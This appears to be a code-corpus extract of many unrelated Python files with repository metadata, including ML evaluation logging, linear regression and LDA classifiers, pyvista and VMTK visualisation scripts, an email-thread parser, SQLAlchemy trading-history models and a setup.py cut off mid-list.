all_probs_base = torch.softmax(torch.cat(lis_logits_base, dim = 0), dim = -1)
sorted_idx = all_energy.sort(descending = False)[1]
save_fn = training_args.output_dir + '/dev_energy.save'
logger.info('saving all_energy to %s', save_fn)
torch.save({'all_energy': all_energy.cpu(), 'all_probs': all_probs.cpu(), 'all_probs_base': all_probs_base.cpu()}, save_fn)
print('low energy:')
for idx in sorted_idx[:10].tolist():
print(idx, '\tenergy:', all_energy[idx].item(), 'prediction prob:', all_probs[idx].tolist(), 'prediction prob baseline:', all_probs_base[idx].tolist(), 'label:', dataset_cal_dev2[idx].label, 'text:', tokenizer.decode(dataset_cal_dev2[idx].input_ids[:100]))
print('high energy:')
for idx in sorted_idx[-10:].tolist():
if torch.argmax(all_probs_base[idx]).item() != dataset_cal_dev2[idx].label:
print(idx, '\tenergy:', all_energy[idx].item(), 'prediction prob:', all_probs[idx].tolist(), 'prediction prob baseline:', all_probs_base[idx].tolist(), 'label:', dataset_cal_dev2[idx].label, 'text:', tokenizer.decode(dataset_cal_dev2[idx].input_ids[:70]))
logger.info('output_dir: %s', training_args.output_dir)
if my_args.train_mode == 'nce_noise':
logger.info('===FINAL NCE_EVAL RESULT===')
report_str = '[EVAL_DATA] '
for idx in final_nce_eval_results: report_str += idx + ':' + str(final_nce_eval_results[idx])[:5] + ', '
logger.info('%s', report_str)
report_str = '[TRAIN_DATA] '
for idx in final_nce_train_results: report_str += idx + ':' + str(final_nce_train_results[idx])[:5] + ', '
logger.info('%s', report_str)
"""
logger.info('===FINAL CHECKLIST_EVAL RESULTS===')
report_str, ll = '', []
for idx in final_checklist_eval_results:
if idx != 'AVG':
report_str += idx + ':' + str(final_checklist_eval_results[idx] * 100)[:5] + '%, '
#ll.append(final_checklist_eval_results[idx])
logger.info('%s AVG: %s', report_str, str(final_checklist_eval_results['AVG'] * 100)[:5] + '%')
"""
logger.info('===FINAL EVAL RESULTS===')
report_str = ''
for idx in final_eval_results: report_str += idx + ':' + str(final_eval_results[idx])[:5] + ', '
logger.info('%s', report_str)
if final_evalres_savefn is not None:
logger.info(final_evalres_savefn)
return eval_results
def _mp_fn(index):
# For xla_spawn (TPUs)
main()
if __name__ == "__main__":
main()
| 50.279732 | 467 | 0.667922 | 2,286 | 0.076157 | 0 | 0 | 2,308 | 0.07689 | 0 | 0 | 8,802 | 0.293234 |
9068b9974dcf2fb879760cc992a13d9cece6f426 | 43 | py | Python | tools/python/myriad/__init__.py | TU-Berlin-DIMA/myriad-toolkit | 5f7610e10b11e05591d6e2dc030c3ca5dc2a90b4 | [
"BSL-1.0"
]
| 15 | 2015-01-18T18:02:16.000Z | 2021-08-02T09:20:35.000Z | tools/python/myriad/__init__.py | TU-Berlin-DIMA/myriad-toolkit | 5f7610e10b11e05591d6e2dc030c3ca5dc2a90b4 | [
"BSL-1.0"
]
| null | null | null | tools/python/myriad/__init__.py | TU-Berlin-DIMA/myriad-toolkit | 5f7610e10b11e05591d6e2dc030c3ca5dc2a90b4 | [
"BSL-1.0"
]
| 5 | 2015-08-10T21:50:39.000Z | 2018-03-14T15:31:28.000Z | __all__ = [ "assistant", "event", "error" ] | 43 | 43 | 0.604651 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 25 | 0.581395 |
9068dd91546f900a5c60936212742aac5fb95fd0 | 577 | py | Python | Python/Advanced/Tuples And Sets/Lab/SoftUni Party.py | EduardV777/Softuni-Python-Exercises | 79db667028aea7dfecb3dbbd834c752180c50f44 | [
"Unlicense"
]
| null | null | null | Python/Advanced/Tuples And Sets/Lab/SoftUni Party.py | EduardV777/Softuni-Python-Exercises | 79db667028aea7dfecb3dbbd834c752180c50f44 | [
"Unlicense"
]
| null | null | null | Python/Advanced/Tuples And Sets/Lab/SoftUni Party.py | EduardV777/Softuni-Python-Exercises | 79db667028aea7dfecb3dbbd834c752180c50f44 | [
"Unlicense"
]
| null | null | null | guests=int(input())
reservations=set([])
while guests!=0:
reservationCode=input()
reservations.add(reservationCode)
guests-=1
while True:
r=input()
if r!="END":
reservations.discard(r)
else:
print(len(reservations))
VIPS=[]; Regulars=[]
for e in reservations:
if e[0].isnumeric():
VIPS.append(e)
else:
Regulars.append(e)
VIPS.sort(); Regulars.sort()
for k in VIPS:
print(k)
for k in Regulars:
print(k)
break | 22.192308 | 37 | 0.514731 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 5 | 0.008666 |
9068dfa377a4e3878aa69220570645e9c12f27ec | 404 | py | Python | locale/pot/api/plotting/_autosummary/pyvista-Plotter-remove_all_lights-1.py | tkoyama010/pyvista-doc-translations | 23bb813387b7f8bfe17e86c2244d5dd2243990db | [
"MIT"
]
| 4 | 2020-08-07T08:19:19.000Z | 2020-12-04T09:51:11.000Z | locale/pot/api/plotting/_autosummary/pyvista-Plotter-remove_all_lights-1.py | tkoyama010/pyvista-doc-translations | 23bb813387b7f8bfe17e86c2244d5dd2243990db | [
"MIT"
]
| 19 | 2020-08-06T00:24:30.000Z | 2022-03-30T19:22:24.000Z | locale/pot/api/plotting/_autosummary/pyvista-Plotter-remove_all_lights-1.py | tkoyama010/pyvista-doc-translations | 23bb813387b7f8bfe17e86c2244d5dd2243990db | [
"MIT"
]
| 1 | 2021-03-09T07:50:40.000Z | 2021-03-09T07:50:40.000Z | # Create a plotter and remove all lights after initialization.
# Note how the mesh rendered is completely flat
#
import pyvista as pv
plotter = pv.Plotter()
plotter.remove_all_lights()
plotter.renderer.lights
# Expected:
## []
_ = plotter.add_mesh(pv.Sphere(), show_edges=True)
plotter.show()
#
# Note how this differs from a plot with default lighting
#
pv.Sphere().plot(show_edges=True, lighting=True)
| 25.25 | 62 | 0.762376 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 185 | 0.457921 |
906c0d695c5d23512c396e22821fa9b115229101 | 880 | py | Python | einsum.py | odiak/einsum | c7c71f8daefcf33b4743cc8dca588577d03bdde6 | [
"MIT"
]
| null | null | null | einsum.py | odiak/einsum | c7c71f8daefcf33b4743cc8dca588577d03bdde6 | [
"MIT"
]
| null | null | null | einsum.py | odiak/einsum | c7c71f8daefcf33b4743cc8dca588577d03bdde6 | [
"MIT"
]
| null | null | null | from typing import Dict, Tuple
import numpy as np
def einsum(expr: str, *args: Tuple[np.ndarray, ...], **kwargs) -> np.ndarray:
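    # Translate an expression written with multi-character index names (indices
    # separated by ',', operands separated by ';') into standard single-letter
    # einsum notation, then delegate to np.einsum.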
(a, b) = map(str.strip, expr.split("->"))
a_ = list(
map(lambda s: list(map(str.strip, s.split(","))), map(str.strip, a.split(";")))
)
b_ = list(map(str.strip, b.split(",")))
chars = "abcdefghijklmnopqrstuvwxyz"
char_map: Dict[str, str] = {}
i = 0
for cs in a_:
for c in cs:
if c not in char_map:
char_map[c] = chars[i]
i += 1
for c in b_:
if c not in char_map:
char_map[c] = chars[i]
i += 1
expr_ = "->".join(
[
",".join(map(lambda ss: "".join(map(lambda s: char_map[s], ss)), a_)),
"".join(map(lambda s: char_map[s], b_)),
]
)
return np.einsum(expr_, *args, **kwargs)
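# Illustrative example (x and w being any shape-compatible 2-D arrays):
#   einsum("batch,dim; dim,out -> batch,out", x, w)
# expands to np.einsum("ab,bc->ac", x, w).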
| 29.333333 | 87 | 0.494318 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 52 | 0.059091 |
906c820368e4e2bf91a72f86c8e3c46b23314109 | 4,201 | py | Python | aarhus/get_roots.py | mikedelong/aarhus | 0c0e94fadd65be8428fe3bd2c92928e1b23fc2a1 | [
"Apache-2.0"
]
| null | null | null | aarhus/get_roots.py | mikedelong/aarhus | 0c0e94fadd65be8428fe3bd2c92928e1b23fc2a1 | [
"Apache-2.0"
]
| 7 | 2017-01-13T19:04:57.000Z | 2017-01-23T14:10:53.000Z | aarhus/get_roots.py | mikedelong/aarhus | 0c0e94fadd65be8428fe3bd2c92928e1b23fc2a1 | [
"Apache-2.0"
]
| null | null | null | import json
import logging
import os
import pickle
import sys
import time
import pyzmail
# http://mypy.pythonblogs.com/12_mypy/archive/1253_workaround_for_python_bug_ascii_codec_cant_encode_character_uxa0_in_position_111_ordinal_not_in_range128.html
reload(sys)
sys.setdefaultencoding("utf8")
logging.basicConfig(format='%(asctime)s : %(levelname)s :: %(message)s', level=logging.DEBUG)
def process_folder(arg_folder, arg_reference, arg_in_or_out, arg_document_count_limit):
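    # Walk arg_folder, parse every message, and collect those whose parsed header
    # dict contains the key arg_reference (e.g. 'references' or 'in-reply-to')
    # when arg_in_or_out is True, or lacks it when False, processing at most
    # arg_document_count_limit documents.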
result = dict()
document_count = 0
no_references_count = 0
references_count = 0
message_id_count = 0
for root, subdirectories, files in os.walk(arg_folder):
for current in files:
# first get the references node
if document_count < arg_document_count_limit:
current_full_file_name = os.path.join(root, current)
if document_count % 1000 == 0 and document_count > 0:
logging.debug("%d %s", document_count, current_full_file_name)
references, message = get_references(current_full_file_name)
if 'references' in references.keys():
# if references.has_key('references'):
references_count += 1
else:
no_references_count += 1
document_count += 1
if 'message-id' in references.keys():
message_id_count += 1
if arg_reference in references.keys() and arg_in_or_out:
result[current] = message
elif arg_reference not in references.keys() and not arg_in_or_out:
result[current] = message
logging.info('documents : %d message-id: %d references: %d no references: %d' % (
document_count, message_id_count, references_count, no_references_count))
return result
def get_references(current_file):
result = {}
with open(current_file, 'rb') as fp:
message = pyzmail.message_from_file(fp)
if 'Message-Id' in message.keys():
result['message-id'] = message['Message-Id']
elif 'Message-ID' in message.keys():
result['message-id'] = message['Message-ID']
elif 'Message-id' in message.keys():
result['message-id'] = message['Message-id']
else:
logging.warn('no message id in file %s', current_file)
logging.info([key for key in message.keys()])
if 'References' in message.keys():
references = message['References'].split(' ')
result['references'] = references
if 'In-Reply-To' in message.keys():
result['in-reply-to'] = message['In-Reply-To']
return result, message
def run():
start_time = time.time()
with open('roots-settings.json') as data_file:
data = json.load(data_file)
logging.debug(data)
input_folder = data['input_folder']
document_count_limit = data['document_count_limit']
if document_count_limit == -1:
document_count_limit = sys.maxint
reference_of_interest = data['reference']
# our internal keys are always lowercase, so we want to be sure
# to use a lowercase reference for comparisons
reference_of_interest = reference_of_interest.lower()
in_or_out = data['reference_in']
in_or_out = bool(in_or_out)
pickle_file = data['output_pickle_file']
documents_of_interest = process_folder(input_folder, reference_of_interest, in_or_out, document_count_limit)
logging.info(
'found %d documents of interest: %s' % (len(documents_of_interest), sorted(documents_of_interest.keys())))
with open(pickle_file, 'wb') as output_fp:
pickle.dump(documents_of_interest, output_fp)
logging.info('wrote pickled dictionary to %s.' % pickle_file)
finish_time = time.time()
elapsed_hours, elapsed_remainder = divmod(finish_time - start_time, 3600)
elapsed_minutes, elapsed_seconds = divmod(elapsed_remainder, 60)
logging.info("Time: {:0>2}:{:0>2}:{:05.2f}".format(int(elapsed_hours), int(elapsed_minutes), elapsed_seconds))
if __name__ == '__main__':
run()
| 40.394231 | 160 | 0.650321 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 914 | 0.217567 |
906d400738f33dc206c78e71d946859aba32483a | 97 | py | Python | python/760.find-anagram-mappings.py | stavanmehta/leetcode | 1224e43ce29430c840e65daae3b343182e24709c | [
"Apache-2.0"
]
| null | null | null | python/760.find-anagram-mappings.py | stavanmehta/leetcode | 1224e43ce29430c840e65daae3b343182e24709c | [
"Apache-2.0"
]
| null | null | null | python/760.find-anagram-mappings.py | stavanmehta/leetcode | 1224e43ce29430c840e65daae3b343182e24709c | [
"Apache-2.0"
]
| null | null | null | class Solution:
    def anagramMappings(self, A: List[int], B: List[int]) -> List[int]:
        # Stub completed with the straightforward approach (assumes `List` is
        # provided by the judge environment or via `from typing import List`):
        # map each value of B to one of its indices, then look up every value of A.
        index_of = {value: index for index, value in enumerate(B)}
        return [index_of[value] for value in A]
| 24.25 | 71 | 0.597938 | 87 | 0.896907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
906d8e08da166b6c85abfbc022b056f7f3eb7ea0 | 1,547 | py | Python | src/jdk.internal.vm.compiler/.mx.graal/mx_graal.py | siweilxy/openjdkstudy | 8597674ec1d6809faf55cbee1f45f4e9149d670d | [
"Apache-2.0"
]
| 2 | 2018-06-19T05:43:32.000Z | 2018-06-23T10:04:56.000Z | src/jdk.internal.vm.compiler/.mx.graal/mx_graal.py | siweilxy/openjdkstudy | 8597674ec1d6809faf55cbee1f45f4e9149d670d | [
"Apache-2.0"
]
| null | null | null | src/jdk.internal.vm.compiler/.mx.graal/mx_graal.py | siweilxy/openjdkstudy | 8597674ec1d6809faf55cbee1f45f4e9149d670d | [
"Apache-2.0"
]
| null | null | null | #
# ----------------------------------------------------------------------------------------------------
#
# Copyright (c) 2007, 2015, Oracle and/or its affiliates. All rights reserved.
# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
#
# This code is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 only, as
# published by the Free Software Foundation.
#
# This code is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# version 2 for more details (a copy is included in the LICENSE file that
# accompanied this code).
#
# You should have received a copy of the GNU General Public License version
# 2 along with this work; if not, write to the Free Software Foundation,
# Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
# or visit www.oracle.com if you need additional information or have any
# questions.
#
# ----------------------------------------------------------------------------------------------------
import mx
if mx.get_jdk(tag='default').javaCompliance < "1.9":
mx.abort('JAVA_HOME is not a JDK9: ' + mx.get_jdk(tag='default').home)
from mx_graal_9 import mx_post_parse_cmd_line, run_vm, get_vm, isJVMCIEnabled # pylint: disable=unused-import
import mx_graal_bench # pylint: disable=unused-import
| 45.5 | 109 | 0.66128 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,329 | 0.859082 |
906df45a0cbaf0b269d84eb1b51d8ce436ca4a79 | 4,621 | py | Python | linear_regression.py | wail007/ml_playground | 5a8cd1fc57d3ba32a255e665fc3480f58eb9c3c2 | [
"Apache-2.0"
]
| null | null | null | linear_regression.py | wail007/ml_playground | 5a8cd1fc57d3ba32a255e665fc3480f58eb9c3c2 | [
"Apache-2.0"
]
| null | null | null | linear_regression.py | wail007/ml_playground | 5a8cd1fc57d3ba32a255e665fc3480f58eb9c3c2 | [
"Apache-2.0"
]
| null | null | null | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import multivariate_normal
class _LinearModel(object):
def __init__(self):
self.w = None
def fit(self, x, y):
pass
def predict(self, x):
return np.dot(x, self.w)
def cost(self, x, y):
pass
def precision(self, x, y):
p = self.predict(x)
return (1.0 / len(p)) * np.sum(p == y)
class LeastSquareRegression(_LinearModel):
def __init__(self):
super(LeastSquareRegression, self).__init__()
def fit(self, x, y):
xt = x.transpose()
self.w = np.linalg.pinv(np.dot(xt, x)).dot(xt).dot(y)
def cost(self, x, y):
""" Residual Sum of Squares """
r = y - np.dot(x, self.w)
rt= np.transpose(r)
return (1.0 / len(x)) * np.trace(np.dot(rt, r))
class RidgeRegression(LeastSquareRegression):
def __init__(self, incr=0.1, min_change=0.001):
super(RidgeRegression, self).__init__()
self.incr = incr
self.min_change = min_change
def fit(self, x, y):
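        # Hold out the last 30% of the data as a validation split and sweep the
        # ridge penalty upward in steps of self.incr, keeping the alpha with the
        # lowest validation cost; stop once the cost change drops below
        # self.min_change, then refit on the training split with the best alpha.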
xtrain, xval = np.split(x, [int(0.7*len(x))])
ytrain, yval = np.split(y, [int(0.7*len(y))])
alpha = 0.0
best_alpha = 0.0
best_cost = float("inf")
old_cost = float("inf")
new_cost = float("inf")
while True:
self._fit(xtrain, ytrain, alpha)
new_cost = self.cost(xval, yval)
if new_cost < best_cost:
best_cost = new_cost
best_alpha = alpha
#print("cost: %f, alpha: %f" % (best_cost, best_alpha))
if abs(new_cost - old_cost) < self.min_change:
break
old_cost = new_cost
alpha += self.incr
self._fit(xtrain, ytrain, best_alpha)
def _fit(self, x, y, alpha):
x = x[:,1:]
xt = np.transpose(x)
self.w = np.linalg.pinv(np.dot(xt, x) + alpha * np.eye(x.shape[1])).dot(xt).dot(y)
bias = np.mean(y, axis=0, keepdims=True) - np.dot(np.mean(x, axis=0, keepdims=True), self.w)
self.w = np.vstack([bias, self.w])
class LeastSquareClassification(LeastSquareRegression):
def __init__(self):
super(LeastSquareClassification, self).__init__()
def predict(self, x):
return super(LeastSquareClassification, self).predict(x).argmax(axis=1)
class RidgeClassification(RidgeRegression):
def __init__(self, incr=0.1, min_change=0.001):
super(RidgeClassification, self).__init__(incr, min_change)
def predict(self, x):
return super(RidgeClassification, self).predict(x).argmax(axis=1)
class LDAClassification(_LinearModel):
def __init__(self):
self.w = None
self.priors = None
self.means = []
self.covs = []
def fit(self, x, y):
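        # Project the data onto the LDA directions, then estimate per-class
        # priors, means and covariances in the projected space for use as a
        # Gaussian classifier in predict().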
k = y.shape[1]
y_arg = np.argmax(y, axis=1)
class_count = np.sum (y, axis=0, keepdims=True)
self.priors = (1.0 / len(y)) * np.sum (y, axis=0, keepdims=True)
self.w = self._lda(x, y)
x_proj = np.dot(x, self.w)
means = (1.0 / class_count.T) * np.dot(y.T, x_proj)
for i in xrange(k):
xk_proj = x_proj[y_arg==i]
self.means.append(np.mean(xk_proj, axis = 0))
self.covs .append(np.cov (xk_proj, rowvar=False))
def predict(self, x):
k = self.w.shape[1]
x_proj = np.dot(x, self.w)
likelihood = np.column_stack([multivariate_normal.pdf(x_proj, self.means[i], self.covs[i]) for i in xrange(k)])
posterior = (likelihood * self.priors)
posterior = posterior / np.sum(posterior, axis=1, keepdims=True)
return np.argmax(posterior, axis=1)
def _lda(self, x, y):
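        # Fisher discriminant directions: build the between-class and
        # within-class scatter matrices and return the top-k eigenvectors of
        # pinv(W) @ B as the projection matrix.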
k = y.shape[1]
y_arg = np.argmax(y, axis=1)
class_count= np.sum (y, axis=0, keepdims=True)
total_mean = np.mean(x, axis=0, keepdims=True)
class_mean = (1.0 / class_count.T) * np.dot(y.T, x)
mk_m = class_mean - total_mean
b_cov = np.dot(class_count * mk_m.T, mk_m)
w_cov = np.zeros(b_cov.shape)
for i in xrange(k):
xk = x[y_arg == i]
xk_mk = xk - class_mean[i]
w_cov += np.dot(xk_mk.T, xk_mk)
eig_vals, eig_vecs = np.linalg.eig(np.dot(np.linalg.pinv(w_cov), b_cov))
eig_vals = np.abs(eig_vals)
eig_args = np.argsort(eig_vals)[::-1][:k]
return eig_vecs[:, eig_args]
| 29.062893 | 119 | 0.554425 | 4,486 | 0.970786 | 0 | 0 | 0 | 0 | 0 | 0 | 101 | 0.021857 |
906e0d5d4effa98640d75d6a7be5cc83893d3c38 | 84 | py | Python | pygments_lexer_solidity/__init__.py | veox/pygments-lexer-solidity | e99ccf980337ceaad4fbc7ee11795e91d7fab0ae | [
"BSD-2-Clause"
]
| 2 | 2018-05-24T14:36:59.000Z | 2019-06-29T23:50:08.000Z | pygments_lexer_solidity/__init__.py | veox/pygments-lexer-solidity | e99ccf980337ceaad4fbc7ee11795e91d7fab0ae | [
"BSD-2-Clause"
]
| null | null | null | pygments_lexer_solidity/__init__.py | veox/pygments-lexer-solidity | e99ccf980337ceaad4fbc7ee11795e91d7fab0ae | [
"BSD-2-Clause"
]
| 1 | 2019-11-11T23:24:17.000Z | 2019-11-11T23:24:17.000Z | from .lexer import SolidityLexer, YulLexer
__all__ = ['SolidityLexer', 'YulLexer']
| 21 | 42 | 0.761905 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 25 | 0.297619 |
906e5ccc6b995d3e3569837e29fff36deedc118c | 1,174 | py | Python | optimal_buy_gdax/history.py | coulterj/optimal-buy-gdax | cdebd2af2cf54bdef34c0ff64a4a731e540bdcdb | [
"Unlicense"
]
| null | null | null | optimal_buy_gdax/history.py | coulterj/optimal-buy-gdax | cdebd2af2cf54bdef34c0ff64a4a731e540bdcdb | [
"Unlicense"
]
| null | null | null | optimal_buy_gdax/history.py | coulterj/optimal-buy-gdax | cdebd2af2cf54bdef34c0ff64a4a731e540bdcdb | [
"Unlicense"
]
| null | null | null | #!/usr/bin/env python3
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, String, Float, DateTime, Integer
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
Base = declarative_base()
class Order(Base):
__tablename__ = 'orders'
id = Column(Integer, primary_key=True)
currency = Column(String)
price = Column(Float)
size = Column(Float)
gdax_order_id = Column(String)
created_at = Column(DateTime)
class Withdrawal(Base):
__tablename__ = 'withdrawals'
id = Column(Integer, primary_key=True)
currency = Column(String)
amount = Column(Float)
crypto_address = Column(String)
gdax_withdrawal_id = Column(String)
class Deposit(Base):
__tablename__ = 'deposits'
id = Column(Integer, primary_key=True)
currency = Column(String)
amount = Column(Float)
payment_method_id = Column(String)
payout_at = Column(DateTime)
gdax_deposit_id = Column(String)
def get_session(engine):
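    # `engine` is a database URL string: build the SQLAlchemy engine, create any
    # missing tables, and return a session bound to it.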
engine = create_engine(engine)
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
return session
| 24.458333 | 63 | 0.721465 | 736 | 0.626917 | 0 | 0 | 0 | 0 | 0 | 0 | 53 | 0.045145 |
906f41f56725ceef73c59638d0fd312fa10a88f9 | 6,689 | py | Python | vmtkScripts/vmtkmeshboundaryinspector.py | ramtingh/vmtk | 4d6f58ce65d73628353ba2b110cbc29a2e7aa7b3 | [
"Apache-2.0"
]
| null | null | null | vmtkScripts/vmtkmeshboundaryinspector.py | ramtingh/vmtk | 4d6f58ce65d73628353ba2b110cbc29a2e7aa7b3 | [
"Apache-2.0"
]
| null | null | null | vmtkScripts/vmtkmeshboundaryinspector.py | ramtingh/vmtk | 4d6f58ce65d73628353ba2b110cbc29a2e7aa7b3 | [
"Apache-2.0"
]
| 1 | 2019-06-18T23:41:11.000Z | 2019-06-18T23:41:11.000Z | #!/usr/bin/env python
## Program: VMTK
## Module: $RCSfile: vmtkmeshboundaryinspector.py,v $
## Language: Python
## Date: $Date: 2006/05/26 12:35:13 $
## Version: $Revision: 1.3 $
## Copyright (c) Luca Antiga, David Steinman. All rights reserved.
## See LICENSE file for details.
## This software is distributed WITHOUT ANY WARRANTY; without even
## the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
## PURPOSE. See the above copyright notices for more information.
from __future__ import absolute_import #NEEDS TO STAY AS TOP LEVEL MODULE FOR Py2-3 COMPATIBILITY
import vtk
import sys
from vmtk import vtkvmtk
from vmtk import vmtkrenderer
from vmtk import pypes
class vmtkMeshBoundaryInspector(pypes.pypeScript):
def __init__(self):
pypes.pypeScript.__init__(self)
self.Mesh = None
self.CellEntityIdsArrayName = 'CellEntityIds'
self.VolumeCellEntityId = 0
self.WallCellEntityId = 1
self.vmtkRenderer = None
self.OwnRenderer = 0
self.ReferenceSystems = None
self.SetScriptName('vmtkmeshboundaryinspector')
self.SetScriptDoc('display a 3D render of the mesh with individual boundary groups colored and labeled')
self.SetInputMembers([
['Mesh','i','vtkUnstructuredGrid',1,'','the input mesh','vmtkmeshreader'],
['CellEntityIdsArrayName','entityidsarray','str',1,''],
['VolumeCellEntityId','volumeid','int',1],
['WallCellEntityId','wallid','int',1],
['vmtkRenderer','renderer','vmtkRenderer',1,'','external renderer']])
self.SetOutputMembers([
['ReferenceSystems','o','vtkPolyData',1,'','the output reference systems with boundary information','vmtksurfacewriter']
])
def Execute(self):
if not self.Mesh:
self.PrintError('Error: No input mesh.')
return
if not self.CellEntityIdsArrayName:
self.PrintError('Error: No input CellEntityIdsArrayName.')
return
if not self.vmtkRenderer:
self.vmtkRenderer = vmtkrenderer.vmtkRenderer()
self.vmtkRenderer.Initialize()
self.OwnRenderer = 1
self.vmtkRenderer.RegisterScript(self)
threshold = vtk.vtkThreshold()
threshold.SetInputData(self.Mesh)
threshold.ThresholdByUpper(self.VolumeCellEntityId+0.5)
threshold.SetInputArrayToProcess(0,0,0,1,self.CellEntityIdsArrayName)
threshold.Update()
boundaryMesh = threshold.GetOutput()
boundaryMesh.GetCellData().SetActiveScalars(self.CellEntityIdsArrayName)
boundaryMapper = vtk.vtkDataSetMapper()
boundaryMapper.SetInputData(boundaryMesh)
boundaryMapper.ScalarVisibilityOn()
boundaryMapper.SetScalarModeToUseCellData()
boundaryMapper.SetScalarRange(boundaryMesh.GetCellData().GetScalars().GetRange())
boundaryActor = vtk.vtkActor()
boundaryActor.SetMapper(boundaryMapper)
self.vmtkRenderer.Renderer.AddActor(boundaryActor)
wallThreshold = vtk.vtkThreshold()
wallThreshold.SetInputData(boundaryMesh)
wallThreshold.ThresholdByLower(self.WallCellEntityId+0.5)
wallThreshold.SetInputArrayToProcess(0,0,0,1,self.CellEntityIdsArrayName)
wallThreshold.Update()
wallMeshToSurface = vtk.vtkGeometryFilter()
wallMeshToSurface.SetInputConnection(wallThreshold.GetOutputPort())
wallMeshToSurface.Update()
boundaryReferenceSystems = vtkvmtk.vtkvmtkBoundaryReferenceSystems()
boundaryReferenceSystems.SetInputConnection(wallMeshToSurface.GetOutputPort())
boundaryReferenceSystems.SetBoundaryRadiusArrayName("BoundaryRadius")
boundaryReferenceSystems.SetBoundaryNormalsArrayName("BoundaryNormals")
boundaryReferenceSystems.SetPoint1ArrayName("Point1Array")
boundaryReferenceSystems.SetPoint2ArrayName("Point2Array")
boundaryReferenceSystems.Update()
self.ReferenceSystems = boundaryReferenceSystems.GetOutput()
cellEntityIdsArray = vtk.vtkIntArray()
cellEntityIdsArray.SetName(self.CellEntityIdsArrayName)
cellEntityIdsArray.SetNumberOfTuples(self.ReferenceSystems.GetNumberOfPoints())
self.ReferenceSystems.GetPointData().AddArray(cellEntityIdsArray)
boundaryThreshold = vtk.vtkThreshold()
boundaryThreshold.SetInputData(boundaryMesh)
boundaryThreshold.ThresholdByUpper(self.WallCellEntityId+0.5)
boundaryThreshold.SetInputArrayToProcess(0,0,0,1,self.CellEntityIdsArrayName)
boundaryThreshold.Update()
boundaryMeshToSurface = vtk.vtkGeometryFilter()
boundaryMeshToSurface.SetInputConnection(boundaryThreshold.GetOutputPort())
boundaryMeshToSurface.Update()
boundarySurface = boundaryMeshToSurface.GetOutput()
pointCells = vtk.vtkIdList()
surfaceCellEntityIdsArray = vtk.vtkIntArray()
surfaceCellEntityIdsArray.DeepCopy(boundarySurface.GetCellData().GetArray(self.CellEntityIdsArrayName))
self.PrintLog('')
for i in range(self.ReferenceSystems.GetNumberOfPoints()):
pointId = boundarySurface.FindPoint(self.ReferenceSystems.GetPoint(i))
boundarySurface.GetPointCells(pointId,pointCells)
cellId = pointCells.GetId(0)
cellEntityId = surfaceCellEntityIdsArray.GetValue(cellId)
cellEntityIdsArray.SetValue(i,cellEntityId)
origin = self.ReferenceSystems.GetPoint(i)
normal = self.ReferenceSystems.GetPointData().GetArray("BoundaryNormals").GetTuple3(i)
radius = self.ReferenceSystems.GetPointData().GetArray("BoundaryRadius").GetTuple1(i)
logLine = 'CellEntityId: %d\n' % cellEntityId
logLine += ' Origin: %f, %f, %f\n' % (origin[0],origin[1],origin[2])
logLine += ' Normal: %f, %f, %f\n' % (normal[0],normal[1],normal[2])
logLine += ' Radius: %f\n' % radius
self.PrintLog(logLine)
self.ReferenceSystems.GetPointData().SetActiveScalars(self.CellEntityIdsArrayName)
labelsMapper = vtk.vtkLabeledDataMapper();
labelsMapper.SetInputData(self.ReferenceSystems)
labelsMapper.SetLabelModeToLabelScalars()
labelsActor = vtk.vtkActor2D()
labelsActor.SetMapper(labelsMapper)
self.vmtkRenderer.Renderer.AddActor(labelsActor)
self.vmtkRenderer.Render()
if self.OwnRenderer:
self.vmtkRenderer.Deallocate()
if __name__=='__main__':
main = pypes.pypeMain()
main.Arguments = sys.argv
main.Execute()
| 39.579882 | 132 | 0.697264 | 5,861 | 0.876215 | 0 | 0 | 0 | 0 | 0 | 0 | 1,290 | 0.192854 |
906fc90146a02fc91c29a4ca6a8d89955a76d227 | 1,542 | py | Python | setup.py | sriz1/mudslide | 78aa8a1bda4080eacd777da7ff6bcbfd9afe129c | [
"MIT"
]
| 4 | 2020-09-05T00:17:27.000Z | 2022-01-25T19:44:32.000Z | setup.py | sriz1/mudslide | 78aa8a1bda4080eacd777da7ff6bcbfd9afe129c | [
"MIT"
]
| null | null | null | setup.py | sriz1/mudslide | 78aa8a1bda4080eacd777da7ff6bcbfd9afe129c | [
"MIT"
]
| 6 | 2020-11-20T15:42:03.000Z | 2022-02-10T02:43:29.000Z | from setuptools import setup
from distutils.util import convert_path
main_ns = {}
ver_path = convert_path('mudslide/version.py')
with open(ver_path) as ver_file:
exec(ver_file.read(), main_ns)
def readme():
with open("README.md") as f:
return f.read()
setup(
name='mudslide',
packages=['mudslide'],
version=main_ns['__version__'],
license='MIT',
description='Package to simulate nonadiabatic molecular dynamics using trajectory methods',
author='Shane M. Parker',
author_email='[email protected]',
url='https://github.com/smparker/mudslide',
download_url='https://github.com/smparker/mudslide/archive/v0.9.tar.gz',
keywords= ['science', 'chemistry', 'nonadiabatic dynamics'],
install_requires=[
'numpy>=1.19',
'scipy',
'typing_extensions'
],
test_suite='nose.collector',
tests_require=['nose'],
entry_points={
'console_scripts': [
'mudslide = mudslide.__main__:main',
'mudslide-surface = mudslide.surface:main'
]
},
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering :: Chemistry',
'Topic :: Scientific/Engineering :: Physics',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
